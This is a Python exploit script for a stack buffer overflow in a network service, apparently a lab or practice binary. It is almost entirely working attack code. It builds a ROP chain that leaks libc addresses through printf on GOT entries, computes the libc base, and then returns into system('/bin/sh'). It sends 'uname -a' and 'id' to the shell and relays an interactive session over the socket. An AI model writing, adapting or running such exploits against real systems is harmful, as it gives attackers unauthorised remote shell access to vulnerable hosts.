#!/usr/bin/env python3 | |
import os
import select
import socket
import sys
from struct import pack,unpack
from telnetlib import Telnet
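TARGET = ("192.168.43.115", 5555)  # Target IP and port (lab host; edit to taste).

# Plain TCP socket to the vulnerable service; connected further down.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


def p64(x):
    """Pack an integer as an 8-byte little-endian qword (x86-64 pointer/gadget).

    The original used the native-order "Q" format, which is little-endian only
    because the attacking host happens to be x86; "<Q" makes the byte order
    explicit so the chain is correct regardless of where the script runs.
    """
    return pack("<Q", x)


def u64(x):
    """Unpack an 8-byte little-endian qword (a leaked pointer) into an int."""
    return unpack("<Q", x)[0]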
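def checkTerms(term, payload):
    """Abort the script if the bad byte *term* occurs anywhere in *payload*.

    term: a length-1 bytes object (b"\\n") or an int byte value (0x20).
    payload: the raw bytes about to be sent.

    On a hit the byte and its first offset are printed and the script exits
    with status 1. The original exited with 0, which made "payload unusable"
    indistinguishable from a clean run for anything wrapping this script.
    """
    if isinstance(term, int):  # accept checkTerms(0x20, buf) as well as b" "
        term = bytes([term])
    pos = payload.find(term)
    if pos == -1:
        return
    print("Found", hex(ord(term)), "in payload, exit.")
    print("    first occurrence at offset", pos)
    sys.exit(1)  # non-zero: the chain cannot be delivered intact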
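# Static addresses from the (non-PIE) target binary. All of these are
# binary-specific; re-derive them (objdump / ROPgadget) if the target changes.
start = 0x400530            # _start: re-enter the program after the leak stage
printf_plt = 0x400500       # printf@plt
printf_got = 0x601018       # printf@got.plt  (leaked through "%s")
scanf_got = 0x601028        # __isoc99_scanf@got.plt (leaked through "%s")
perc_s = 0x400758           # a "%s" string inside the binary
pop_rdi = 0x400723          # pop rdi ; ret
pop_rsi_r15 = 0x400721      # pop rsi ; pop r15 ; ret

# Bytes that end the input read on the target. Newline and space are what
# the original checked; if the input is really read with scanf("%s") (the
# binary imports __isoc99_scanf), every C isspace() byte terminates the
# token, so tab/CR/VT/FF are included too. NUL does not stop scanf("%s"),
# which is why the high zero bytes of each qword are fine.
BAD_CHARS = b"\n \t\r\x0b\x0c"


def leak_got(got_slot):
    """ROP fragment for printf("%s", got_slot): prints the resolved libc pointer.

    pop_rsi_r15 pops two qwords, so the slot address is supplied twice; the
    second copy just lands in r15 and is ignored.
    """
    return b"".join([
        p64(pop_rdi), p64(perc_s),                        # rdi = "%s"
        p64(pop_rsi_r15), p64(got_slot), p64(got_slot),   # rsi = slot, r15 = junk
        p64(printf_plt),                                  # call printf@plt
    ])


# Stage one: overflow past the 216 bytes up to the saved return address, leak
# two GOT entries, then jump back to _start so we get a second overflow.
buf = b"A" * 216
buf += leak_got(printf_got)
buf += leak_got(scanf_got)
buf += p64(start)           # restart the program for stage two

for bad in BAD_CHARS:       # any of these inside the chain would truncate it
    checkTerms(bytes([bad]), buf)
buf += b"\n"                # line terminator so the read returns
print("[i] Payload ready.")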
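s.connect(TARGET)           # connect to the target service
print(s.recv(1024))         # banner/prompt, informational only

# sendall() keeps writing until every byte is queued; a bare send() may
# return after a partial write and silently truncate the ROP chain.
s.sendall(buf)
print("[i] Payload sent.")

# The chain calls printf("%s") on two GOT slots. A userland x86-64 pointer has
# its top two bytes zero, so each "%s" yields at most 6 bytes before the NUL
# -> 12 leaked bytes after the service's "received." text. TCP is a stream,
# so one recv(1024) may deliver only part of that; keep reading until the
# marker plus 12 bytes are present, the peer closes, or a size cap is hit.
MARKER = b"received."
resp = bytearray()
while len(resp) < 1 << 16:
    chunk = s.recv(4096)
    if not chunk:           # peer closed the connection
        break
    resp += chunk
    idx = resp.find(MARKER)
    if idx != -1 and len(resp) - (idx + len(MARKER)) >= 12:
        break
resp = bytes(resp)
print("[i] Reply received.")
print(resp)

idx = resp.find(MARKER)
if idx == -1:
    print("[!] Marker", MARKER, "not found in the reply; cannot parse leaks, exit.")
    sys.exit(1)
leaks = resp[idx + len(MARKER):]
if len(leaks) < 12:
    print("[!] Only", len(leaks), "bytes after the marker, expected 12; exit.")
    sys.exit(1)
# Zero-extend each 6-byte leak to a full qword before unpacking. If a pointer
# happened to contain a NUL within its low 6 bytes, "%s" would stop early and
# this fixed 6/6 split would be off; re-run the exploit in that case.
printf_libc = u64(leaks[:6].ljust(8, b"\x00"))
scanf_libc = u64(leaks[6:12].ljust(8, b"\x00"))
print("[*] Leaked libc printf:\t\t", hex(printf_libc))
print("[*] Leaked libc __isoc99_scanf:\t", hex(scanf_libc))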
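# libc offsets. These are specific to one libc build (the values look like
# Ubuntu 18.04's glibc 2.27 — TODO confirm against the target's libc, e.g.
# `readelf -s libc.so.6 | grep -E ' (printf|system)@@'` and
# `strings -tx libc.so.6 | grep /bin/sh`).
printf_libc_off = 0x064e80
libc_base = printf_libc - printf_libc_off  # rebase from the leaked printf pointer
print("[*] Calculated libc base:\t", hex(libc_base))

# A shared object is mapped on a page boundary. Low bits set in the base
# mean the leak was mis-parsed or the offset belongs to a different libc;
# firing system() at a bogus address would only crash the target.
if libc_base & 0xFFF:
    print("[!] libc base", hex(libc_base), "is not page aligned: bad leak or wrong offsets, exit.")
    sys.exit(1)

system = libc_base + 0x04f440   # system()
bin_sh = libc_base + 0x1b3e9a   # "/bin/sh" string inside libc
ret = 0x400661                  # lone `ret` gadget in the binary (stack alignment)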
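# Stage two: the program restarted (ret to _start), so overflow again and
# return into system("/bin/sh").
buf = b"B" * 216            # padding up to the saved return address
# glibc's system() needs rsp 16-byte aligned at entry (its prologue uses
# aligned SSE stores); a lone `ret` consumes one qword and fixes the
# alignment left by the overflow.
buf += p64(ret)
buf += p64(pop_rdi)
buf += p64(bin_sh)          # rdi = "/bin/sh"
buf += p64(system)          # call system

# Same terminators as stage one: newline/space plus the remaining C isspace()
# bytes, in case the input is read with scanf("%s").
for bad in b"\n \t\r\x0b\x0c":
    checkTerms(bytes([bad]), buf)
buf += b"\n"                # line terminator so the read returns
print("[i] Shell payload ready.")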
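s.sendall(buf)              # deliver stage two in full (no partial writes)
print("[i] Payload sent.")

# Prime the (hoped-for) shell with a couple of commands, then relay the
# socket to the terminal. The original used telnetlib.Telnet.interact(),
# which decodes the stream as text (hence its UnicodeDecodeError fallback)
# and is deprecated since Python 3.11 / removed in 3.13 (PEP 594); the
# `from telnetlib import Telnet` at the top of the file can go once nothing
# uses it. This raw select() relay keeps bytes as bytes. POSIX only:
# select() on stdin does not work on Windows.
s.sendall(b"\nuname -a\nid\n")
print("[i] Attempting interactive shell.")
stdin_fd = sys.stdin.fileno()
out = sys.stdout.buffer
try:
    while True:
        readable, _, _ = select.select([s, stdin_fd], [], [])
        if s in readable:
            data = s.recv(4096)
            if not data:    # remote side closed: the shell is gone
                print("\n[i] Connection closed by remote host.")
                break
            out.write(data)
            out.flush()
        if stdin_fd in readable:
            # os.read on the fd, not sys.stdin.readline(): a buffered reader
            # could swallow more than one line and starve select().
            typed = os.read(stdin_fd, 4096)
            if not typed:   # EOF on our stdin (Ctrl-D): stop relaying
                break
            s.sendall(typed)
except KeyboardInterrupt:
    print("\n[i] Interrupted.")
finally:
    s.close()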